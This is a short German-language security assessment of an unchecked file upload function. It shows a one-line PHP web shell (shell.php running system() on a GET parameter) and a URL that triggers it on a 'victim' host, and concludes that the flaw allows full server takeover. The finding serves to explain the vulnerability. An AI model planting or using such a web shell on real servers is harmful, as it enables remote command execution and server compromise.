Sicherheitsbewertung – Schwachstelle im Dateiupload

Beschreibung: Diese Upload-Funktion speichert beliebige Dateien direkt im Verzeichnis uploads/ ohne jede Prüfung auf Typ oder Inhalt.

Beispiel (gefährlicher Upload):

Dateiname: shell.php
Inhalt:
<?php system($_GET['cmd']); ?>

Nach dem Hochladen aufrufen mit:

http://victim/uploads/shell.php?cmd=whoami

⚠️ Fazit:

Dieser Code demonstriert eine klassische unsichere Dateiupload-Schwachstelle. Sie kann zur vollständigen Übernahme des Webservers führen.